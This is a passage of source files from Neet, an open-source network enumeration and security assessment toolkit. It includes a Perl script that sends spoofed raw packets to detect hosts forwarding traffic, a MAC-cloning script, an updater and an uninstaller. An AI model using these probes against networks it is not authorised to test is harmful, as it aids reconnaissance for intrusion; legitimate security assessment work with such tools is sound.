","; 46 | } else { 47 | print "\n"; 48 | } 49 | } 50 | } 51 | 52 | sub handleFile { 53 | # $File::Find::dir is the current directory name, 54 | # $_ is the current filename within that directory 55 | # $File::Find::name is the complete pathname to the file. 56 | return 0 if ( "$_" ne "tcpports.txt"); 57 | push @_ports, listPorts($_); 58 | } 59 | 60 | sub listPorts { 61 | my $file=shift(); 62 | my @ports; 63 | if (open(FH,$file)){ 64 | until (eof FH){ 65 | my $line=readline (*FH); 66 | next if ($line !~ /^\d/); 67 | $line =~ s/(^\d+)[\s\S]+\s/$1/; 68 | push @ports, $line; 69 | } 70 | close FH; 71 | } 72 | return @ports; 73 | } 74 | -------------------------------------------------------------------------------- /content/main/bin/fwdetect: -------------------------------------------------------------------------------- 1 | #!/usr/bin/perl -w 2 | 3 | ########################################################################## 4 | # 5 | # Neet: Network discovery, enumeration and security assessment tool 6 | # Copyright (C) 2008-2016 Jonathan Roach 7 | # 8 | # This program is free software: you can redistribute it and/or modify 9 | # it under the terms of the GNU General Public License as published by 10 | # the Free Software Foundation, either version 3 of the License, or 11 | # (at your option) any later version. 12 | # 13 | # This program is distributed in the hope that it will be useful, 14 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 15 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 16 | # GNU General Public License for more details. 17 | # 18 | # You should have received a copy of the GNU General Public License 19 | # along with this program. If not, see . 20 | # 21 | # Contact: jonnyhightower [at] funkygeek.com 22 | # 23 | ########################################################################## 24 | 25 | use strict; 26 | use NetAddr::IP; 27 | use Net::PcapUtils; 28 | use Net::RawIP; 29 | use Net::ARP; 30 | use NetPacket::Ethernet; 31 | use NetPacket::IP; 32 | 33 | unshift @INC, "/opt/neet/core"; 34 | require JR::NetUtils::NetUtils; 35 | 36 | # The purpose of this script is to test whether or not an IP interface is configured to forward IP packets. This is useful in identifying potential routes out of a network. 37 | # We do this by sending an IP packet to the interface under test, destined for our IP address, but the target MAC address. The SRC IP and MAC addresses should be unimportant 38 | # as we aren't using ARP packets and no cache poisoning should take place. 39 | 40 | # If the device is NOT forwarding packets, it should just ignore them. If it IS forwarding, then it should forward it back to us. We can identify our packets by the payload. 41 | # Exits with value of 1 if the host is NOT forwarding, or with 0 if it IS forwarding. 42 | 43 | # By Jonathan Roach: jonny.hightower at gmail.com. 44 | 45 | my $host=$ARGV[0]; 46 | my $argQuiet=$ARGV[1]; 47 | my $notForwarding=1; 48 | my $quiet=0; 49 | 50 | if ($argQuiet && ("$argQuiet" eq "-q")){ 51 | $quiet=1; 52 | } 53 | 54 | die ("Usage: $0 [-q]\n") if (!$host); 55 | 56 | if ($host !~ /^\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}$/){ 57 | die ("Invalid IP address: $host\n"); 58 | } 59 | 60 | my @octets=split "\\.", $host; 61 | for my $o (@octets){ 62 | if ($o > 255){ 63 | die ("Invalid IP address: $host\n"); 64 | } 65 | } 66 | 67 | my %data; 68 | my $timeout=3; # Seconds - for waiting for ARP reply, and for waiting for the IP packet reply 69 | my $payload="JR's Interface Routing Test!!"; 70 | 71 | my @ifconfig=`/sbin/ip addr show`; 72 | for my $name (interfaceInfo ("list",@ifconfig)){ 73 | next if ("$name" eq "lo"); 74 | my ($ip,$mask,$bcast,$mac,$object)=interfaceInfo($name,@ifconfig); 75 | $data{'int'}{$name}{'mac'}=$mac; 76 | $data{'int'}{$name}{'ip'}=$ip; 77 | $data{'int'}{$name}{'mask'}=$mask; 78 | $data{'int'}{$name}{'bcast'}=$bcast; 79 | } 80 | 81 | for my $interface (keys(%{$data{'int'}})){ 82 | my $intobj=NetAddr::IP->new($data{'int'}{$interface}{'ip'},$data{'int'}{$interface}{'mask'}); 83 | my $trgobj=NetAddr::IP->new($host); 84 | if ($intobj->contains($trgobj)){ 85 | $data{$host}{'int'}=$interface; 86 | last; 87 | } 88 | } 89 | 90 | if (!$data{$host}{'int'}){ 91 | print "Host $host is not on any of the locally connected network segments\n" if (!$quiet); 92 | exit 4; 93 | } 94 | 95 | # Now we need to calculate a Fake IP address from which to send the packets 96 | my $ourIP=$data{'int'}{$data{$host}{'int'}}{'ip'}; 97 | my $ourMask=$data{'int'}{$data{$host}{'int'}}{'mask'}; 98 | my $ourObj=NetAddr::IP->new($ourIP,$ourMask); 99 | my $network=$ourObj->network->addr; 100 | my $broadcast=$ourObj->broadcast->addr; 101 | 102 | my $fakeIP=$ourObj; $fakeIP = $fakeIP + 1; 103 | my $fake=$fakeIP->addr(); 104 | if (!($fake ne $network && $fake ne $broadcast)){ 105 | $fakeIP=$ourObj; $fakeIP = $fakeIP - 1; 106 | $fake=$fakeIP->addr(); 107 | } 108 | 109 | # Set an alarm to terminate the pcap loops 110 | $SIG{'ALRM'}=sub { 111 | die ("TIMEOUT"); 112 | }; 113 | 114 | # Set up listener to catch ARP replies 115 | my $pid=open(CHILD, "-|"); 116 | if (!$pid){ 117 | my $mac=$data{'int'}{$data{$host}{'int'}}{'mac'}; $mac =~ s/://g; 118 | Net::PcapUtils::loop(\&process_arp_pkt, 'FILTER' => 'arp', 'DEV' => $data{$host}{'int'}, 'USERDATA' =>"$mac $host"); 119 | exit; 120 | } 121 | 122 | # Set up another listener to catch IP replies 123 | my $pid2=open(CHILD2, "-|"); 124 | if (!$pid2){ 125 | my $mac=$data{'int'}{$data{$host}{'int'}}{'mac'}; $mac =~ s/://g; 126 | Net::PcapUtils::loop(\&process_ip_pkt, 'FILTER' => 'ip', 'DEV' => $data{$host}{'int'}, 'USERDATA' =>"$mac $host"); 127 | exit; 128 | } 129 | 130 | # Wait for children to initialise 131 | sleep 1; 132 | 133 | print "* Acquiring MAC address\n" if (!$quiet); 134 | sendArpRequest($data{$host}{'int'},$data{'int'}{$data{$host}{'int'}}{'ip'},$data{'int'}{$data{$host}{'int'}}{'mac'},$host,"ff:ff:ff:ff:ff:ff"); 135 | sendArpRequest($data{$host}{'int'},$data{'int'}{$data{$host}{'int'}}{'ip'},$data{'int'}{$data{$host}{'int'}}{'mac'},$host,"ff:ff:ff:ff:ff:ff"); 136 | 137 | # Read the replies from the listener 138 | eval { 139 | alarm $timeout; 140 | while (my $reply=){ 141 | chomp $reply; 142 | if ($reply =~ /^$host /){ 143 | $reply =~ s/\S+ (\w\w:\w\w:\w\w:\w\w:\w\w:\w\w)/$1/; 144 | $data{$host}{'mac'}=$reply; 145 | } 146 | last if ($data{$host}{'mac'}); 147 | } 148 | alarm 0; 149 | }; 150 | 151 | if ("$@" =~ /^TIMEOUT/){ 152 | print "Failed to acquire MAC address for $host\n"; 153 | system("kill $pid"); 154 | system("kill $pid2"); 155 | exit 2; 156 | } 157 | 158 | # Now we have the MAC address, terminate the ARP listener. 159 | system("kill $pid"); 160 | $pid=0; 161 | 162 | print "* Got MAC address $data{$host}{'mac'} for $host\n" if (!$quiet); 163 | 164 | # Now prepare the packet 165 | my $n = Net::RawIP->new ({ 166 | ip => { 167 | 'saddr' => $fake, 168 | 'daddr' => $data{'int'}{$data{$host}{'int'}}{'ip'} 169 | }, 170 | generic => { 171 | 'data' => "$payload $host" 172 | } 173 | }); 174 | $n->ethnew($data{$host}{'int'}); 175 | $n->ethset(source => '00:11:22:33:44:55', dest =>$data{$host}{'mac'}); 176 | print "* Sending IP packet\n" if (!$quiet); 177 | $n->ethsend; 178 | 179 | # Read the replies from the listener 180 | eval { 181 | alarm $timeout; 182 | while (my $reply=){ 183 | chomp $reply; 184 | if ($reply eq "GOTREPLY"){ 185 | print "$host is forwarding packets\n" if (!$quiet); 186 | $notForwarding=0; 187 | last; 188 | } 189 | } 190 | alarm 0; 191 | }; 192 | 193 | if ("$@" =~ /^TIMEOUT/){ 194 | print "$host is NOT forwarding packets\n" if (!$quiet); 195 | $notForwarding=1; 196 | } 197 | 198 | $SIG{'ALRM'}=''; 199 | 200 | # Terminate the IP listener. 201 | system("kill $pid2"); 202 | 203 | exit $notForwarding; 204 | 205 | sub process_ip_pkt { 206 | # This is processed by the listener, once for each ARP packet that is received 207 | my ($data, $hdr, $pkt) = @_; 208 | my ($ourMac,$target)=split " ", $data; 209 | my $ethObj = NetPacket::Ethernet->decode($pkt); 210 | my $dstMac=$ethObj->{dest_mac}; 211 | if ("$dstMac" eq "$ourMac"){ 212 | my $ipObj=NetPacket::IP->decode($pkt); 213 | my $data=$ipObj->{data}; 214 | # STDOUT goes to the CHILD handle in the parent process because we used open() with a pipe to fork with IPC 215 | if ($data =~ /$payload $target$/){ 216 | print "GOTREPLY\n"; 217 | } 218 | } 219 | } 220 | 221 | sub process_arp_pkt { 222 | # This is processed by the listener, once for each ARP packet that is received 223 | my ($data, $hdr, $pkt) = @_; 224 | my ($ourMac,$target)=split " ", $data; 225 | my $ethObj = NetPacket::Ethernet->decode($pkt); 226 | my $dstMac=$ethObj->{dest_mac}; 227 | if ("$dstMac" eq "$ourMac"){ 228 | my $srcMac=$ethObj->{src_mac}; 229 | my $srcIP; 230 | for my $a (0,1,2,3){ 231 | $srcIP .= ord(substr($pkt,(28+$a),1)) . "."; 232 | } 233 | chop $srcIP; 234 | $srcMac=substr($srcMac,0,2) . ":" . substr($srcMac,2,2) . ":" . substr($srcMac,4,2) . ":" . substr($srcMac,6,2) . ":" . substr($srcMac,8,2) . ":" . substr($srcMac,10,2); 235 | # STDOUT goes to the CHILD handle in the parent process because we used open() with a pipe to fork with IPC 236 | print "$srcIP $srcMac\n"; 237 | } 238 | } 239 | 240 | sub sendArpRequest { 241 | my $dev=shift(); 242 | my $srcIP=shift(); 243 | my $srcMac=shift(); 244 | my $dstIP=shift(); 245 | my $dstMac=shift(); 246 | Net::ARP::send_packet($dev,$srcIP,$dstIP,$srcMac,$dstMac,'request'); 247 | } 248 | 249 | -------------------------------------------------------------------------------- /content/main/bin/ip2name: -------------------------------------------------------------------------------- 1 | #!/usr/bin/perl 2 | 3 | my $TLD=$ENV{'NeetTLD'}; 4 | my $use=$ENV{'useNames'}; 5 | 6 | my %names; 7 | if ($use){ 8 | if (open(N,"${TLD}/hostnames.txt")){ 9 | until (eof N){ 10 | my $line=readline(*N); 11 | chomp $line; 12 | if ($line =~ /\S/){ 13 | my ($ip,$name)=split " ", $line; 14 | $names{$ip}=$name; 15 | } 16 | } 17 | close N; 18 | } 19 | } 20 | 21 | while (my $line=<>){ 22 | if ($use){ 23 | 24 | my $ip=$line; $ip =~ s/\D{0,}(\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})\D[\S\s]+$/$1/; 25 | if ($ip =~ /^\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}$/){ 26 | my $name=$names{$ip}; 27 | if ($name){ 28 | if ($use == 2){ 29 | $line =~ s/$ip/$ip ($name)/g; 30 | } else { 31 | $line =~ s/$ip/$name/g; 32 | } 33 | } 34 | } else { 35 | $ip=$line; $ip =~ s/^[\S\s]+ (\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})[\S\s]+$/$1/; 36 | if ($ip =~ /^\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}$/){ 37 | my $name=$names{$ip}; 38 | if ($name){ 39 | if ($use == 2){ 40 | $line =~ s/$ip/$ip ($name)/g; 41 | } else { 42 | $line =~ s/$ip/$name/g; 43 | } 44 | } 45 | } 46 | } 47 | } 48 | print $line; 49 | } 50 | -------------------------------------------------------------------------------- /content/main/bin/memo: -------------------------------------------------------------------------------- 1 | #!/usr/bin/perl -w 2 | 3 | ########################################################################## 4 | # 5 | # Neet: Network discovery, enumeration and security assessment tool 6 | # Copyright (C) 2008-2016 Jonathan Roach 7 | # 8 | # This program is free software: you can redistribute it and/or modify 9 | # it under the terms of the GNU General Public License as published by 10 | # the Free Software Foundation, either version 3 of the License, or 11 | # (at your option) any later version. 12 | # 13 | # This program is distributed in the hope that it will be useful, 14 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 15 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 16 | # GNU General Public License for more details. 17 | # 18 | # You should have received a copy of the GNU General Public License 19 | # along with this program. If not, see . 20 | # 21 | # Contact: jonnyhightower [at] funkygeek.com 22 | # 23 | ########################################################################## 24 | 25 | # Ensure we can find our Perl modules 26 | BEGIN { 27 | unshift @INC, "/opt/neet/core"; 28 | } 29 | 30 | use Neet::Logging; 31 | use strict; 32 | my $logFile=shift(@ARGV); 33 | my $msg=join " ", @ARGV; 34 | if ($ENV{'IP'}){ 35 | $msg = $ENV{'IP'} . ": $msg"; 36 | } 37 | my $log=Neet::Logging->new(); 38 | $log->LogFile("$logFile"); 39 | $log->OpenLog("quiet"); 40 | $log->Memo("$msg\n"); 41 | $log->CloseLog("quiet"); 42 | 43 | -------------------------------------------------------------------------------- /content/main/bin/neet-update: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | ########################################################################## 4 | # 5 | # Neet: Network discovery, enumeration and security assessment tool 6 | # Copyright (C) 2008-2016 Jonathan Roach 7 | # 8 | # This program is free software: you can redistribute it and/or modify 9 | # it under the terms of the GNU General Public License as published by 10 | # the Free Software Foundation, either version 3 of the License, or 11 | # (at your option) any later version. 12 | # 13 | # This program is distributed in the hope that it will be useful, 14 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 15 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 16 | # GNU General Public License for more details. 17 | # 18 | # You should have received a copy of the GNU General Public License 19 | # along with this program. If not, see . 20 | # 21 | # Contact: jonnyhightower [at] funkygeek.com 22 | # 23 | ########################################################################## 24 | 25 | if [ `id -u` -ne 0 ]; then 26 | echo "You must be root to update Neet." 27 | exit 1 28 | fi 29 | 30 | export INVOKEDBYNEETUPDATE=1 31 | export PREFIX=/opt 32 | export NEET="${PREFIX}/neet" 33 | export CONFDIR="${NEET}/etc" 34 | export CONFIG="${CONFDIR}/neet.conf" 35 | export INST="$PWD" 36 | 37 | if [ ! -f "${NEET}/core/installsupport" ]; then 38 | echo "Couldn't locate the install support file. Exiting." 39 | exit 1 40 | else 41 | . "${NEET}/core/installsupport" 42 | fi 43 | 44 | BASEURI="https://github.com/JonnyHightower/REPO/archive/VERSION.tar.gz" 45 | REPOS="neet neet-deps neet-bundled neet-shell neet-upload neet-resources neet-modules" 46 | 47 | # The --local argument prevents neet-update accessing the Internet to check for updates. 48 | # In this case, neet-update only checks for repos that have already been packaged into 49 | # the staging area. 50 | LOCALONLY=0 51 | for arg in $1 $2 $3 $4; do 52 | if [ "$arg" == "--local" ]; then 53 | echo "Checking local repos only" 54 | LOCALONLY=1 55 | break 56 | fi 57 | done 58 | 59 | # The basic gist is to check each repo to see if it contains a newer version than 60 | # the locally-installed version. 61 | echo " + Checking for updated neet components..." 62 | for repo in $REPOS; do 63 | localOnly=0 64 | cd "${NEET}/core/update" 65 | 66 | #echo " + Checking repo $repo" 67 | installed=`getVersion $repo` 68 | 69 | # For local testing 70 | if [ $LOCALONLY -eq 1 ] || [ -f "stage-$repo" ]; then 71 | localOnly=1 72 | fi 73 | if [ -f "stage-$repo" ]; then 74 | remote=`cat "stage-$repo"` 75 | fi 76 | if [ $localOnly -eq 0 ]; then 77 | remote=`${NEET}/core/githubVersion $repo $installed` 78 | if [ -z $remote ]; then 79 | if [ "$installed" != "0.0.0" ]; then 80 | echo " - Package $repo is already at the latest version ($installed)." 81 | else 82 | echo " - Package $repo is not available." 83 | fi 84 | continue 85 | fi 86 | fi 87 | 88 | REPO=`echo $BASEURI | sed -e "s/REPO/$repo/" -e "s/VERSION/$remote/"` 89 | 90 | echo " + Downloading and installing $repo version $remote" 91 | echo " > $REPO" 92 | 93 | # Again - to facilitate local testing 94 | if [ $localOnly -eq 0 ]; then 95 | rm -f "${repo}.tar.gz" # Just in case an old version already exists 96 | wget "$REPO" -q -O "${repo}.tar.gz" 97 | if [ $? -gt 0 ]; then 98 | echo " - There was an error downloading this component. Not updating." 99 | rm -f "${repo}.tar.gz" 100 | continue 101 | fi 102 | fi 103 | 104 | if [ -f "${repo}.tar.gz" ]; then 105 | # Extract the tarball 106 | archive="${repo}-${remote}" 107 | rm -rf "$archive" # Just in case 108 | 109 | tar xzf "${repo}.tar.gz" 110 | if [ $? -gt 0 ]; then 111 | echo " ! Error extracting $repo" 112 | echo " Not updating this component." 113 | rm -f "${repo}.tar.gz" 114 | continue 115 | fi 116 | if [ -x "${archive}/install.sh" ]; then 117 | #echo " + Installing component $repo version $remote..." 118 | cd "$archive" 119 | ./install.sh 120 | 121 | # Clean up afterwards 122 | cd "${NEET}/core/update" 123 | rm -rf "$archive" 124 | rm -f "${repo}.tar.gz" 125 | rm -f "stage-$repo" 126 | else 127 | echo " ! Got component $repo version $remote but can't install it!" 128 | fi 129 | 130 | else 131 | echo " - Could not find this component. Not updating." 132 | fi 133 | done 134 | 135 | # Warn about metasploit 136 | if [ ! -x /opt/metasploit/app/msfcli ]; then 137 | echo 138 | echo "!!! Could not find Metasploit installation. This will badly affect the" 139 | echo " exploit functions in the Neet shell (and may kill your pets)." 140 | echo 141 | fi 142 | 143 | -------------------------------------------------------------------------------- /content/main/bin/netconfig: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | ########################################################################## 4 | # 5 | # Neet: Network discovery, enumeration and security assessment tool 6 | # Copyright (C) 2008-2016 Jonathan Roach 7 | # 8 | # This program is free software: you can redistribute it and/or modify 9 | # it under the terms of the GNU General Public License as published by 10 | # the Free Software Foundation, either version 3 of the License, or 11 | # (at your option) any later version. 12 | # 13 | # This program is distributed in the hope that it will be useful, 14 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 15 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 16 | # GNU General Public License for more details. 17 | # 18 | # You should have received a copy of the GNU General Public License 19 | # along with this program. If not, see . 20 | # 21 | # Contact: jonnyhightower [at] funkygeek.com 22 | # 23 | ########################################################################## 24 | 25 | function usage { 26 | echo "Usage: netconfig " 27 | if [ -f ifaddrshow.txt ]; then 28 | echo 29 | echo "Interfaces:" 30 | grep BROADCAST ifaddrshow.txt | grep -v "state DOWN" | awk {print'$2'} | sed -e 's/://' 31 | fi 32 | echo 33 | exit 1 34 | } 35 | 36 | if [ -z $1 ]; then 37 | usage 38 | fi 39 | 40 | if [ ! -f ifaddrshow.txt ] || ! grep " $1: " ifaddrshow.txt >/dev/null 2>&1; then 41 | usage 42 | fi 43 | 44 | HW=`grep " $1: " ifaddrshow.txt -A1 | grep "link/ether" | awk {print'$2'}` 45 | IP=`grep " $1: " ifaddrshow.txt -A2 | grep " inet " | awk {print'$2'}` 46 | 47 | echo "Setting $1 HW $HW $IP" 48 | /sbin/ifconfig $1 hw ether $HW 49 | /sbin/ifconfig $1 hw ether $HW 50 | /sbin/ifconfig $1 $IP 51 | /sbin/ifconfig $1 $IP 52 | 53 | -------------------------------------------------------------------------------- /content/main/bin/updateLocations: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | ########################################################################## 4 | # 5 | # Neet: Network discovery, enumeration and security assessment tool 6 | # Copyright (C) 2008-2016 Jonathan Roach 7 | # 8 | # This program is free software: you can redistribute it and/or modify 9 | # it under the terms of the GNU General Public License as published by 10 | # the Free Software Foundation, either version 3 of the License, or 11 | # (at your option) any later version. 12 | # 13 | # This program is distributed in the hope that it will be useful, 14 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 15 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 16 | # GNU General Public License for more details. 17 | # 18 | # You should have received a copy of the GNU General Public License 19 | # along with this program. If not, see . 20 | # 21 | # Contact: jonnyhightower [at] funkygeek.com 22 | # 23 | ########################################################################## 24 | 25 | # Check that we have a proper representation of the binary 26 | # paths 27 | export NEET="/opt/neet" 28 | export CONFDIR="${NEET}/etc" 29 | 30 | rm -f "${CONFDIR}/locations" 31 | echo "neet=$NEET" > "${CONFDIR}/locations" 32 | 33 | for bin in nmap amap tcptraceroute traceroute wget sslscan dig rpcclient net snmpwalk ruby java \ 34 | ldapsearch medusa smbclient snmpget snmpset nmblookup rpcinfo xwd ntpdate ldapsearch \ 35 | openssl openvas-nasl winexe; do 36 | 37 | if type $bin >/dev/null 2>&1; then 38 | SystemPath=`type $bin 2>/dev/null | awk {print'$3'}` 39 | if ! grep ^${bin}= "${CONFDIR}/locations" >/dev/null 2>&1; then 40 | echo "$bin=$SystemPath" >> "${CONFDIR}/locations" 41 | else 42 | cat "${CONFDIR}/locations" | grep -v ^${bin}= > "${CONFDIR}/locations.tmp" 43 | mv "${CONFDIR}/locations.tmp" "${CONFDIR}/locations" 44 | echo "$bin=$SystemPath" >> "${CONFDIR}/locations" 45 | fi 46 | fi 47 | done 48 | 49 | OWD="$PWD" 50 | cd "${NEET}/pkg/bin/" 51 | for bin in *; do 52 | if ! grep ^${bin}= "${CONFDIR}/locations" >/dev/null 2>&1; then 53 | echo "${bin}=${NEET}/pkg/bin/$bin" >> "${CONFDIR}/locations" 54 | else 55 | cat "${CONFDIR}/locations" | grep -v ^${bin}= > "${CONFDIR}/locations.tmp" 56 | mv "${CONFDIR}/locations.tmp" "${CONFDIR}/locations" 57 | echo "${bin}=${NEET}/pkg/bin/$bin" >> "${CONFDIR}/locations" 58 | fi 59 | done 60 | cd "$OWD" 61 | 62 | -------------------------------------------------------------------------------- /content/main/man/neet-qs.1.gz: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/JonnyHightower/neet/eafac0fa6666234fee103e031e08d144a79f9e2e/content/main/man/neet-qs.1.gz -------------------------------------------------------------------------------- /content/main/man/neet.1.gz: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/JonnyHightower/neet/eafac0fa6666234fee103e031e08d144a79f9e2e/content/main/man/neet.1.gz -------------------------------------------------------------------------------- /content/main/man/neetsh.1.gz: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/JonnyHightower/neet/eafac0fa6666234fee103e031e08d144a79f9e2e/content/main/man/neetsh.1.gz -------------------------------------------------------------------------------- /content/uninstall.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | ########################################################################## 4 | # 5 | # Neet: Network discovery, enumeration and security assessment tool 6 | # Copyright (C) 2008-2016 Jonathan Roach 7 | # 8 | # This program is free software: you can redistribute it and/or modify 9 | # it under the terms of the GNU General Public License as published by 10 | # the Free Software Foundation, either version 3 of the License, or 11 | # (at your option) any later version. 12 | # 13 | # This program is distributed in the hope that it will be useful, 14 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 15 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 16 | # GNU General Public License for more details. 17 | # 18 | # You should have received a copy of the GNU General Public License 19 | # along with this program. If not, see . 20 | # 21 | # Contact: jonnyhightower [at] funkygeek.com 22 | # 23 | ########################################################################## 24 | 25 | if [ `id -u` -ne 0 ]; then 26 | echo "You must be root to remove Neet." 27 | exit 1 28 | fi 29 | 30 | PREFIX=/opt 31 | export PREFIX 32 | export NEET="${PREFIX}/neet" 33 | export CONFDIR="${NEET}/etc" 34 | export CONFIG="${CONFDIR}/neet.conf" 35 | export INST="$PWD" 36 | 37 | INSTALLED=1 38 | DOUNINSTALL=1 39 | 40 | # Import some functions 41 | if [ -f "${NEET}/core/installsupport" ]; then 42 | . "${NEET}/core/installsupport" 43 | else 44 | . install/installsupport 45 | fi 46 | 47 | if [ ! -d "${NEET}/bin" ]; then 48 | INSTALLED=0 49 | fi 50 | 51 | if [ -z $NEETINSTALLER ]; then 52 | # Standalone uninstall 53 | if [ $INSTALLED -eq 0 ]; then 54 | echo "Neet installation not found in $PREFIX/. Can't uninstall." 55 | exit 1 56 | fi 57 | echo "This will remove Neet and its components. Are you sure? [y/N]" 58 | read -sn1 r 59 | if [ -z "$r" ] || [ "$r" != "y" ]; then 60 | echo "Uninstall aborted by user." 61 | exit 0 62 | fi 63 | 64 | else 65 | # Being run as part of the neet installer 66 | if [ $INSTALLED -eq 0 ]; then 67 | echo "No previous NEET installation found." 68 | DOUNINSTALL=0 69 | else 70 | echo "- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -" 71 | echo 72 | echo "A previous Neet installation was found, and will be removed first. This" 73 | echo "will remove the previous installation of Neet and all its components." 74 | echo "Are you sure? [y/N]" 75 | read -sn1 r 76 | if [ -z "$r" ] || [ "$r" != "y" ]; then 77 | echo "Uninstall aborted by user. Neet installation will not continue." 78 | exit 0 79 | fi 80 | fi 81 | fi 82 | 83 | if [ $DOUNINSTALL -eq 1 ]; then 84 | echo "Uninstalling" 85 | for bin in neetsh neet neet-maint gethash mimikatz neet-update; do 86 | [ -s "/usr/bin/$bin" ] && rm "/usr/bin/$bin" -f 87 | # Old versions of neet 88 | [ -s "/usr/local/sbin/$bin" ] && rm "/usr/local/sbin/$bin" -f 89 | done 90 | 91 | # Preserve config in case we want to use it in future 92 | if [ -f "${CONFIG}" ]; then 93 | mv "${CONFIG}" ${HOME}/neet.conf.saved 94 | fi 95 | 96 | # Do the main deed 97 | rm -rf "${NEET}" 98 | 99 | # Old versions of neet 100 | rm -rf /etc/neet/ 101 | 102 | # Now the man pages 103 | MANIN=0 104 | if [ -f /etc/manpath.config ]; then 105 | for path in `grep ^MANDATORY_MANPATH /etc/manpath.config | grep /usr/local/ | awk {print'$2'}`; do 106 | if [ -d "$path" ]; then 107 | MANIN=1 108 | manpath=$path 109 | break 110 | fi 111 | done 112 | else 113 | for path in `echo $MANPATH | sed -e 's/:/ /g'`; do 114 | if [ -d "$path" ]; then 115 | MANIN=1 116 | manpath=$path 117 | break 118 | fi 119 | done 120 | fi 121 | if [ $MANIN -eq 0 ]; then 122 | manpath=/usr/share/man 123 | MANIN=1 124 | fi 125 | 126 | if [ $MANIN -eq 1 ]; then 127 | for man in neet.1.gz neetsh.1.gz neet-qs.1.gz; do 128 | rm -f ${manpath}/man1/${man} 129 | done 130 | fi 131 | 132 | # Older versions of neet stored man pages in /usr/share/man. Remove them in case 133 | # this process picked a different man path. 134 | rm -f /usr/share/man/man1/neet* 135 | 136 | echo "Neet has been removed from the system" 137 | fi 138 | 139 | -------------------------------------------------------------------------------- /install.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | cd content 4 | . ./install.sh 5 | 6 | --------------------------------------------------------------------------------